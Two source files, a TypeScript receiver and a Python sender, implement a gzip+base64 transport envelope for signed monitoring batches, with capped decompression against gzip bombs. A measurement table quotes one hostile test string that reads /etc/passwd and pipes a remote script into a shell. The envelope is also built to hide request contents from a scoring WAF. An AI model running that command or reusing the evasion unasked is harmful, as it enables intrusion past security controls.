File: aggregator/lib/envelope.ts
/**
 * Plicul de transport, văzut din partea care îl deschide.
 *
 * Geamănul care îl închide e `sentinel/report/envelope.py`, iar acolo e scris de
 * ce există: marginea găzduirii ăsteia are un WAF cu punctaj care inspectează
 * corpul JSON, `session_commands` e singurul flux al cărui conținut e format din
 * linii de comandă, iar patru–șase apariții ale unei comenzi banale („trei
 * treceri, șase picate", măsurat pe gazdă) urcă scorul peste prag și cererea
 * primește `403` de la margine. Cursorul avansează doar pe ecoul filigranului,
 * deci lotul se retrimite la infinit și tot ce vine după stă în spate.
 *
 * ## Ce NU se schimbă
 *
 * **Semnătura e peste octeții DINĂUNTRU.** `lib/signature.ts` primește ce a ieșit
 * de aici, nu ce a sosit pe sârmă, și rămâne HMAC peste forma canonică din
 * `sentinel/report/signing.py` — geamăna lui `lib/verify.ts`, identică la octet.
 * Plicul e transport, nu conținut semnat. Cine ar verifica semnătura peste
 * octeții plicului ar rupe contractul acela, iar simptomul ar fi 401 la fiecare
 * lot, adică exact ce arată o cheie greșită.
 *
 * **Ordinea din protocol rămâne:** antet `X-Sentinel-Instance` → se caută cheia
 * → HMAC peste octeții semnați → `payload.instance_id === antet`. Plicul se
 * deschide între pasul întâi și al doilea, fiindcă pasul al doilea are nevoie de
 * octeții dinăuntru; antetele nu intră niciodată în el.
 *
 * ## Amândouă formele, în timpul rulării
 *
 * Agregatorul se publică separat de gazdă și ÎNAINTEA ei — aceeași ordine ca la
 * martor în `docs/PLAN-arhitectura-distribuita.md`. Deci ruta trebuie să accepte
 * și JSON în clar (expeditorul de azi) și plic (expeditorul de mâine), fără
 * comutator și fără configurație: un comutator ar fi o a doua sursă de adevăr
 * despre ce e pe sârmă, iar dezacordul ei cu realitatea se vede ca 401.
 *
 * Discriminatorul e PREFIXUL, comparat în timp constant, nu o analiză JSON a
 * corpului: o analiză ar muta parsarea unui corp de până la `MAX_BODY_BYTES`
 * înaintea verificării semnăturii. Forma canonică începe întotdeauna cu
 * `{"batch_seq":` (cheile se emit sortate pe puncte de cod), deci nu poate fi
 * confundată cu un plic. Prețul e că ordinea câmpurilor din plic face parte din
 * contract; de-aia prefixul e o constantă la ambele capete, legată de un test.
 *
 * ## Plafonul la decomprimare
 *
 * Ruta e publică pentru cine cunoaște un identificator de instanță, iar
 * decomprimarea are loc ÎNAINTE de verificarea semnăturii — nu poate fi altfel,
 * fiindcă semnătura e peste ce iese din ea. Deci un plic mic care se desface în
 * gigaocteți e o cerere nesemnată care consumă memoria agregatorului.
 *
 * Două plafoane, și fac lucruri diferite:
 *
 *   * **`MAX_INFLATED_BYTES`** — cât are voie să iasă, în absolut. E chiar
 *     `MAX_BODY_BYTES`, adică exact cât acceptă și calea în clar: plicul nu
 *     lărgește nimic, poartă același corp pe alt drum. Se aplică ÎN TIMPUL
 *     decomprimării, nu după: verificat după, gigaoctetul e deja alocat, iar
 *     refuzul e o formalitate peste o mașină care a căzut.
 *   * **`MAX_INFLATE_RATIO`** — de câte ori are voie corpul semnat să fie mai
 *     mare decât plicul primit. Primul nu-l acoperă: un plic de 8 KB care se
 *     desface în 8 MB costă atacatorul de o mie de ori mai puțin decât munca pe
 *     care o provoacă.
 *
 * **De ce raportul NU e un filtru peste ce poate produce gzip**, fiindcă asta e
 * prima idee și e greșită: măsurat pe corpuri reale, un lot LEGITIM atinge orice
 * raport pe care îl atinge o bombă. `argv` e nemărginit la sursă și călătorește
 * neatins, deci un singur rând cu o linie de comandă lungă și repetitivă dă 992,
 * în timp ce 8 MB din același octet dau 1026 (tabelul întreg e în
 * `sentinel/report/envelope.py`). Un plafon sub 992 ar opri un lot valid pentru
 * totdeauna și ar da oricui are shell pe gazda monitorizată o comandă prin care
 * oprește arhiva externă — fix proprietatea pentru care există arhiva.
 *
 * Deci raportul e o inegalitate pe care EXPEDITORUL o respectă prin construcție,
 * umplând plicul până când e destul de mare, iar partea asta doar o verifică.
 * Plafonul nu poate opri un lot valid, iar amplificarea rămâne mărginită.
 */

import zlib from "node:zlib";

import { MAX_BODY_BYTES } from "./ingest";

/** Transformarea pe care o poartă plicul. Geamăna: `ENVELOPE_ENCODING` din
 *  `sentinel/report/envelope.py`. */
export const ENVELOPE_ENCODING = "gzip+base64";

/** Versiunea plicului. O versiune necunoscută se REFUZĂ cu mesaj, nu se citește
 *  „cât se poate": un plic v2 citit ca v1 ar produce alți octeți sub aceeași
 *  semnătură. */
export const ENVELOPE_VERSION = 1;

/**
 * Octeții după care se recunoaște un plic.
 *
 * Comparație pe prefix, nu analiză JSON — vezi capul modulului. Expeditorul
 * emite exact șirul ăsta la începutul corpului, iar acordul e ținut de
 * `tests/unit/test_transport_envelope.py`.
 */
export const ENVELOPE_PREFIX = '{"enc":"gzip+base64"';

/**
 * Cât are voie să iasă din decomprimare, în absolut.
 *
 * Scris ca `MAX_BODY_BYTES`, nu ca un număr propriu, fiindcă asta E afirmația:
 * plicul poartă același corp pe alt drum, deci acceptă exact cât acceptă calea
 * în clar. Un număr propriu ar putea diverge, iar divergența s-ar vedea ca un
 * flux oprit pe un lot pe care `config-check` îl declară legal.
 */
export const MAX_INFLATED_BYTES = MAX_BODY_BYTES;

/** De câte ori are voie corpul semnat să fie mai mare decât plicul primit.
 *  Geamăna: `MAX_INFLATE_RATIO` din `sentinel/report/envelope.py`. */
export const MAX_INFLATE_RATIO = 64;

/**
 * Cât are voie să aibă corpul PRIMIT, care poate fi un plic.
 *
 * Nu e o relaxare a plafonului de conținut, e condiția ca plicul să nu accepte
 * mai puțin decât calea pe care o înlocuiește. Un plic e base64 (`×4/3`) peste
 * gzip, iar gzip nu comprimă nimic pe un text de entropie mare — `argv` și
 * `params` sunt nemărginite la sursă și influențate de cine are shell pe gazda
 * monitorizată. Măsurat pe corpuri de entropie maximă, plicul iese cu până la
 * ~10% MAI MARE decât conținutul. Cu `MAX_BODY_BYTES` pus la citire, un lot care
 * azi pleacă neîmpachetat ar fi refuzat definitiv după împachetare — iar de pe
 * gazdă asta arată ca un agregator căzut, fiindcă `ship_once` nu deosebește un
 * non-2xx de altul.
 *
 * Derivat, nu ales: expansiunea maximă a lui gzip pe date necomprimabile e sub
 * 0,1% (blocuri stocate, 5 octeți la 65 535) plus antetul, iar base64 e exact
 * `ceil(n/3)*4`. Cei 4 KiB acoperă antetul plicului și rotunjirile.
 *
 * Plafonul pe CONȚINUT nu dispare: se aplică octeților semnați, în `POST`, o
 * singură dată pentru amândouă formele.
 */
export const MAX_WIRE_BYTES = Math.ceil(MAX_INFLATED_BYTES * 4 / 3) + 4096;

/**
 * Cât scoate zlib într-o bucată.
 *
 * Scris pe față fiindcă e marginea de eroare a opririi: decomprimarea se oprește
 * la prima bucată care trece de plafon, deci se pot produce cel mult
 * `plafon + INFLATE_CHUNK` octeți. Un test se sprijină pe numărul ăsta ca să
 * dovedească EFECTUL opririi — nu că plafonul e scris în cod, ci că octeții nu
 * s-au produs.
 */
export const INFLATE_CHUNK = 16 * 1024;

export type Inflated =
  | { ok: true; body: Buffer; produced: number }
  | { ok: false; kind: "over-cap" | "corrupt"; produced: number; detail: string };

/**
 * Decomprimare cu plafon aplicat ÎN TIMPUL ei.
 *
 * `produced` e numărul de octeți care CHIAR au ieșit din zlib înainte de a se
 * opri — nu mărimea reală a conținutului, pe care refuzul o face necunoscută.
 * E acolo ca să se poată proba efectul: un plafon verificat după decomprimare ar
 * întoarce același verdict, dar `produced` ar fi mărimea întreagă.
 *
 * Nu se folosește `gunzipSync(..., { maxOutputLength })`: face același lucru,
 * dar aruncă, deci nu poate spune câți octeți s-au produs — iar atunci singura
 * dovadă că oprirea e devreme ar fi citirea codului.
 */
export function inflateBounded(packed: Buffer, cap: number): Promise<Inflated> {
  return new Promise<Inflated>((resolve) => {
    const gunzip = zlib.createGunzip({ chunkSize: INFLATE_CHUNK });
    const chunks: Buffer[] = [];
    let produced = 0;
    let settled = false;
    const settle = (result: Inflated) => {
      if (settled) return;
      settled = true;
      resolve(result);
    };

    gunzip.on("data", (chunk: Buffer) => {
      produced += chunk.length;
      if (produced > cap) {
        // ACUM, nu la sfârșit. `destroy()` oprește decomprimarea; restul
        // conținutului nu se mai produce și nu se mai alochează.
        gunzip.destroy();
        settle({ ok: false, kind: "over-cap", produced,
                 detail: `decomprimarea a depășit ${cap} de octeți` });
        return;
      }
      chunks.push(chunk);
    });
    gunzip.on("end", () => settle({ ok: true, body: Buffer.concat(chunks), produced }));
    gunzip.on("error", (err: Error) => settle({
      ok: false, kind: "corrupt", produced,
      // `destroy()` de mai sus produce și el un `error` („premature close"),
      // dar `settled` e deja pus, deci nu poate rescrie verdictul.
      detail: err.message,
    }));
    gunzip.end(packed);
  });
}

export type Unwrapped =
  | { ok: true; body: Buffer; wrapped: boolean }
  | { ok: false; status: number; detail: string };

/** `true` dacă octeții primiți încep cu prefixul plicului. */
export function looksWrapped(raw: Buffer): boolean {
  return raw.length >= ENVELOPE_PREFIX.length
    && raw.subarray(0, ENVELOPE_PREFIX.length).toString("latin1") === ENVELOPE_PREFIX;
}

/** Base64 strict: alfabetul standard, umplutura la locul ei, lungime multiplu de 4.
 *
 *  `Buffer.from(s, "base64")` e ÎNGĂDUITOR — sare peste ce nu recunoaște —, deci
 *  fără verificarea asta un corp stricat pe drum ar produce tăcut alți octeți,
 *  iar refuzul ar veni de la gzip sau de la semnătură, cu alt nume. */
const BASE64 = /^[A-Za-z0-9+/]+={0,2}$/;

/**
 * Octeții peste care se verifică semnătura, oricare ar fi forma de pe sârmă.
 *
 * Un corp care nu e plic se întoarce NEATINS: e chiar el corpul semnat. Asta e
 * jumătatea „acceptă amândouă formele", și e o ramură fără nicio prelucrare
 * tocmai ca să nu poată schimba nimic pentru expeditorul aflat azi în producție.
 */
export async function unwrap(raw: Buffer): Promise<Unwrapped> {
  if (!looksWrapped(raw)) return { ok: true, body: raw, wrapped: false };

  let outer: unknown;
  try {
    outer = JSON.parse(raw.toString("utf8"));
  } catch {
    return { ok: false, status: 400, detail: "plicul de transport nu e JSON valid" };
  }
  if (outer === null || typeof outer !== "object" || Array.isArray(outer)) {
    return { ok: false, status: 400, detail: "plicul de transport nu e un obiect JSON" };
  }
  const env = outer as Record<string, unknown>;

  if (env.enc !== ENVELOPE_ENCODING) {
    return { ok: false, status: 400,
             detail: `plic cu enc="${String(env.enc)}"; agregatorul cunoaște ` +
                     `"${ENVELOPE_ENCODING}"` };
  }
  if (env.v !== ENVELOPE_VERSION) {
    // Refuz explicit, nu „citește cât poți": un plic de altă versiune citit cu
    // regulile ăstea ar produce alți octeți sub aceeași semnătură.
    return { ok: false, status: 400,
             detail: `plic de versiunea ${String(env.v)}; agregatorul cunoaște ` +
                     `versiunea ${ENVELOPE_VERSION} și are nevoie de o publicare` };
  }
  if (typeof env.body !== "string" || env.body === ""
      || env.body.length % 4 !== 0 || !BASE64.test(env.body)) {
    // Lungimea multiplu de 4 se cere separat de alfabet: `Buffer.from` ar
    // decoda și un șir trunchiat, tăcut, iar octeții rezultați ar fi alții
    // decât cei semnați — refuzul ar veni de la gzip sau de la semnătură, cu
    // alt nume decât cauza.
    return { ok: false, status: 400,
             detail: "câmpul `body` al plicului nu e base64 valid" };
  }

  const packed = Buffer.from(env.body, "base64");
  // Plafonul care se aplică e cel mai mic dintre cele două, ca decomprimarea să
  // se oprească la primul depășit; care anume a fost se spune în mesaj, fiindcă
  // reacția e alta — unul cere un lot mai mic pe expeditor, celălalt e un defect
  // al împachetării.
  const byRatio = raw.length * MAX_INFLATE_RATIO;
  const cap = Math.min(MAX_INFLATED_BYTES, byRatio);
  const out = await inflateBounded(packed, cap);
  if (!out.ok) {
    if (out.kind === "corrupt") {
      return { ok: false, status: 400,
               detail: `plicul nu se poate decomprima: ${out.detail}` };
    }
    return {
      ok: false, status: 413,
      detail: byRatio < MAX_INFLATED_BYTES
        ? `plicul are ${raw.length} octeți și se desface în peste ${cap}; ` +
          `raportul acceptat e ${MAX_INFLATE_RATIO}. Nimic nu a fost citit din ` +
          "el. Expeditorul umple plicul tocmai ca inegalitatea asta să fie " +
          "adevărată, deci un refuz aici e un defect de împachetare, nu un lot " +
          "prea mare."
        : `plicul se desface în peste ${MAX_INFLATED_BYTES} de octeți, adică ` +
          "peste plafonul de corp al agregatorului. Nimic nu a fost citit din " +
          "el; micșorează ship.max_rows_per_batch pe expeditor.",
    };
  }
  return { ok: true, body: out.body, wrapped: true };
}

File: sentinel/report/envelope.py
"""Plicul de transport: cum ies octeții semnați dintr-o margine care îi citește.

## Pana care a cerut modulul ăsta

Marginea găzduirii agregatorului are un WAF **cu punctaj** care inspectează
corpul JSON al cererii. Fiecare tipar considerat suspect adaugă la un scor;
peste prag, cererea primește `403 Forbidden` în text simplu — nu formatul
nostru, și niciun `403` nu există pe calea `/api/sentinel/sync` în codul de la
celălalt capăt.

`session_commands` e singurul flux al cărui conținut e format din **linii de
comandă**, deci singurul care adună punctaj. Iar `ship_once` avansează cursorul
numai pe ecoul filigranului, deci un lot respins nu mută nimic: același lot
pleacă la nesfârșit, tot ce vine după stă în spate, iar autodiagnosticul
raportează `ship:lag`.

**Cât de puțin trebuie ca să se rupă** — măsurat pe gazda de producție, cu cereri
nesemnate (aplicația răspunde `401` la orice ajunge la ea, deci `401` = a trecut
de margine, orice altceva = oprit înainte):

| proba | rezultat |
|---|---|
| 24 de rânduri reale, JSON în clar | **403** |
| aceleași 24, cu `argv`/`exe` înlocuite cu text inofensiv | 401 |
| aceleași 24, `base64` într-un câmp JSON | **401** |
| `python3 /tmp/mkbody.py` × 1 | 401 |
| × 3 | 401 |
| × 6 | **403** |
| corp de 4 MB din aceeași literă | 401 |
| 400 de rânduri sintetice uniforme | 401 |
| un singur șir ostil (`cat /etc/passwd; curl http://…|sh`) | 401 |

Adică: **trei treceri, șase picate.** Nu mărimea, nu numărul de rânduri, nu
`User-Agent`-ul, nu adresa sursă, nu un rând anume — scorul cumulat pe conținut,
atins de patru–șase apariții ale unei linii de comandă banale (`cat`, `wc -c`,
`python3 /tmp/mkbody.py 400`). Muncă de administrare, nu sarcini de atacator.
Se scrie aici fiindcă altfel următorul om va presupune că a fost ceva exotic și
va căuta rândul vinovat, care nu există.

## Ce face plicul, și ce NU atinge

Corpul devine opac pentru orice intermediar care încearcă să-l citească drept
conținut: `gzip`, apoi `base64`, într-un câmp al unui plic JSON. Varianta asta e
cea PROBATĂ în tabelul de mai sus (rândul cu `401`), nu una raționată.

**Semnătura rămâne peste octeții canonici DINĂUNTRU, neschimbată.**
`sentinel/report/signing.py` și `aggregator/lib/verify.ts` sunt gemeni identici
la octet, iar contractul ăla nu se atinge de aici. Plicul e TRANSPORT, nu
conținut semnat: se aplică DUPĂ `sign()` și se scoate ÎNAINTE de verificare.
Scris pe față fiindcă e exact felul în care cineva ar strica lucrurile mai
târziu — semnând plicul „ca să fie mai simplu" ar rupe geamănul din TypeScript
fără să se vadă altfel decât ca un 401 la fiecare lot, adică exact ce arată o
cheie greșită.

**Antetele rămân în afara plicului.** `X-Sentinel-Instance` e citit ca să se
găsească cheia, înainte de orice verificare; ordinea din protocol — antet →
HMAC peste octeții semnați → `payload.instance_id == antet` — nu se schimbă.

## Forma pe sârmă

    {"enc":"gzip+base64","v":1,"pad":"000…","body":"H4sIA…"}

Primii octeți sunt fixați (`ENVELOPE_PREFIX`) și ASTA e discriminatorul la
receptor: un corp care nu începe cu ei e tratat ca JSON în clar. Alegerea e
deliberată — un prefix se citește în timp constant, în timp ce „parsează și
uită-te dacă are câmpul `enc`" ar muta o analiză JSON a întregului corp
ÎNAINTEA verificării semnăturii. Prețul e că ordinea câmpurilor din plic face
parte din contract: emis altfel, receptorul l-ar citi ca JSON în clar și
semnătura ar pica, adică un 401 care arată ca o cheie greșită. De-aia prefixul e
o constantă la ambele capete, legată de un test.

Forma canonică peste care se semnează începe întotdeauna cu `{"batch_seq":`
(cheile se emit sortate pe puncte de cod), deci nu poate fi confundată cu un
plic.

## Umplutura, și de ce nu e o ciudățenie

Receptorul mărginește decomprimarea în două feluri: dimensiunea absolută (nu mai
mult decât acceptă pe calea în clar) ȘI raportul față de octeții primiți. Al
doilea există fiindcă primul nu-l acoperă: un plic de 8 KB care se desface în
8 MB costă atacatorul o mie de ori mai puțin decât munca pe care o provoacă, iar
ruta e publică pentru cine cunoaște un identificator de instanță.

Problema, măsurată înainte de a alege numărul: **un lot LEGITIM poate atinge
orice raport pe care îl poate atinge o bombă.** `argv` e nemărginit la sursă și
călătorește neatins, deci un singur rând cu o linie de comandă foarte lungă și
repetitivă dă un corp aproape omogen:

| corp | raport gzip |
|---|---|
| 2000 de rânduri reale, comenzi amestecate | 17 |
| 2000 de rânduri cu același `argv` scurt | 74 |
| 2000 de rânduri cu același `argv` de 4 KB | 448 |
| 20 de rânduri cu `argv` de 400 KB | 751 |
| 1 rând cu `argv` de 8 MB | 992 |
| 8 MB din același octet (bombă) | 1026 |

Un plafon de raport pus între 992 și 1026 e o lamă de cuțit; unul sub 992
oprește un lot valid **pentru totdeauna** — și, mai rău, i-ar da oricui are
shell pe gazda monitorizată o comandă prin care oprește arhiva externă, adică
fix proprietatea pentru care există arhiva. Deci raportul nu poate fi un filtru
peste ce iese din gzip.

Ce se face în schimb: **expeditorul ÎȘI GARANTEAZĂ raportul, umplând.** Dacă
octeții comprimați sunt de mai mult de `MAX_INFLATE_RATIO` ori mai puțini decât
cei semnați, se adaugă `pad` până când plicul e destul de mare. Receptorul
verifică o inegalitate pe care expeditorul o respectă prin construcție, deci
plafonul nu poate opri un lot valid, iar amplificarea rămâne mărginită la
`MAX_INFLATE_RATIO`. Costul, pe cel mai comprimabil lot măsurat: plicul crește
de la 25 KB la 131 KB — tot de 64 de ori mai mic decât cei 8,4 MB în clar.

Umplutura e un șir dintr-un singur caracter, iar caracterul e o CIFRĂ, nu `A`:
un corp lung dintr-o singură literă a trecut de margine în măsurătoarea de mai
sus, dar o serie lungă de `A` e semnătura clasică a unei probe de depășire de
tampon, adică exact genul de tipar pentru care un WAF cu punctaj are o regulă.
"""

from __future__ import annotations

import base64
import gzip
from dataclasses import dataclass

from sentinel.errors import SentinelError

__all__ = [
    "ENVELOPE_ENCODING", "ENVELOPE_PREFIX", "ENVELOPE_VERSION", "GZIP_LEVEL",
    "MAX_INFLATE_RATIO", "PAD_CHAR", "Envelope", "EnvelopeError", "wrap",
]

#: Ce transformare poartă plicul. Geamăna e `ENVELOPE_ENCODING` din
#: `aggregator/lib/envelope.ts`; dezacordul se vede ca 400 la fiecare lot.
ENVELOPE_ENCODING = "gzip+base64"

#: Versiunea plicului. Receptorul refuză explicit o versiune pe care n-o
#: cunoaște, cu mesaj — nu o citește „cât poate", fiindcă un plic v2 citit ca v1
#: ar produce alți octeți sub aceeași semnătură.
ENVELOPE_VERSION = 1

#: Octeții după care receptorul recunoaște un plic. Vezi capul modulului pentru
#: de ce un prefix și nu o analiză JSON.
ENVELOPE_PREFIX = b'{"enc":"gzip+base64"'

#: De câte ori are voie corpul semnat să fie mai mare decât plicul care îl duce.
#:
#: Nu e un filtru peste ce poate produce gzip — vezi tabelul din capul modulului,
#: unde un lot legitim atinge 992 și o bombă 1026. E o inegalitate pe care
#: EXPEDITORUL o respectă prin construcție, umplând, iar receptorul o verifică.
#: Consecința: plafonul nu poate opri un lot valid, iar cine trimite un plic
#: nesemnat plătește cel puțin a 64-a parte din munca pe care o provoacă.
MAX_INFLATE_RATIO = 64

#: Caracterul de umplutură. Cifră, nu `A` — vezi capul modulului.
PAD_CHAR = "0"

#: Nivelul de comprimare.
#:
#: 6 (implicitul zlib), nu 9: măsurat pe un lot de 2000 de rânduri de
#: `session_commands`, 9 câștigă 14% din octeți și costă de 2,6 ori mai mult
#: timp (7,3 ms față de 2,8 ms). Câștigul de care avem nevoie e ordinul de
#: mărime — 17× față de 1× —, nu ultimele procente.
GZIP_LEVEL = 6


class EnvelopeError(SentinelError):
    """Plicul nu s-a putut construi așa cum îl cere receptorul.

    Nu e retryabilă: aceiași octeți dau același rezultat. Cine o prinde ratează
    lotul, nu-l reia — iar rândurile rămân pe gazdă, fiindcă un cursor care nu a
    avansat E coada.
    """


@dataclass(frozen=True)
class Envelope:
    """Plicul gata de trimis, cu ce a costat.

    `wire` sunt octeții care pleacă. `inner_bytes` sunt octeții SEMNAȚI — cei
    peste care s-a calculat HMAC-ul și cei pe care receptorul trebuie să-i vadă
    înapoi, identici la octet.
    """

    wire: bytes
    inner_bytes: int
    gzip_bytes: int
    padding_bytes: int

    @property
    def ratio(self) -> float:
        """De câte ori e corpul semnat mai mare decât plicul care îl duce.

        Peste octeții TRIMIȘI, nu peste cei comprimați: ăsta e numărul care se
        compară cu `MAX_INFLATE_RATIO` la celălalt capăt, iar unul calculat pe
        gzip singur ar fi mai mare și ar da o impresie greșită despre cât de
        aproape de plafon e lotul.
        """
        return self.inner_bytes / len(self.wire) if self.wire else 0.0


def wrap(body: bytes) -> Envelope:
    """Octeții semnați, împachetați pentru transport.

    `body` sunt EXACT octeții peste care s-a semnat — forma canonică din
    `signing.py`. Nu se re-serializează nimic aici și nu se atinge nimic
    dinăuntru: plicul e o anvelopă, iar orice atingere a conținutului ar invalida
    o semnătură deja calculată.
    """
    if not isinstance(body, (bytes, bytearray)):
        raise EnvelopeError(
            f"plicul poartă octeții semnați, nu {type(body).__name__}")
    body = bytes(body)

    # `mtime=0`: fără el, gzip pune ceasul în antet, deci același corp produce
    # alți octeți la fiecare rulare. N-ar rupe nimic — semnătura e pe conținut,
    # nu pe plic —, dar un plic reproductibil e un plic pe care un test îl poate
    # compara.
    packed = gzip.compress(body, compresslevel=GZIP_LEVEL, mtime=0)
    encoded = base64.b64encode(packed).decode("ascii")

    head = f'{{"enc":"{ENVELOPE_ENCODING}","v":{ENVELOPE_VERSION},"pad":"'
    tail = f'","body":"{encoded}"}}'
    # Cât trebuie să aibă plicul ca inegalitatea receptorului să fie adevărată.
    # `-(-a // b)` e împărțirea în sus fără float: un `ceil` pe float ar putea
    # rotunji în jos pe corpuri de ordinul gigaoctetului, iar diferența dintre
    # „exact plafonul" și „cu un octet peste" e chiar refuzul.
    needed = -(-len(body) // MAX_INFLATE_RATIO)
    padding = max(0, needed - (len(head) + len(tail)))
    wire = (head + PAD_CHAR * padding + tail).encode("ascii")

    # Efectul, nu intenția: se verifică inegalitatea pe octeții CARE PLEACĂ, nu
    # aritmetica de mai sus. O greșeală în calculul umpluturii ar da altfel un
    # plic pe care receptorul îl refuză cu 413 la fiecare rundă, iar de pe gazdă
    # asta arată ca un agregator căzut — `ship_once` nu deosebește un non-2xx de
    # altul. Aici se vede ca un lot ratat, cu numele problemei în jurnal.
    if len(wire) * MAX_INFLATE_RATIO < len(body):
        raise EnvelopeError(
            f"plicul are {len(wire)} octeți pentru un corp semnat de "
            f"{len(body)}, adică peste raportul de {MAX_INFLATE_RATIO} pe care "
            f"agregatorul îl acceptă; umplutura nu a fost calculată corect")

    return Envelope(wire=wire, inner_bytes=len(body), gzip_bytes=len(packed),
                    padding_bytes=padding)
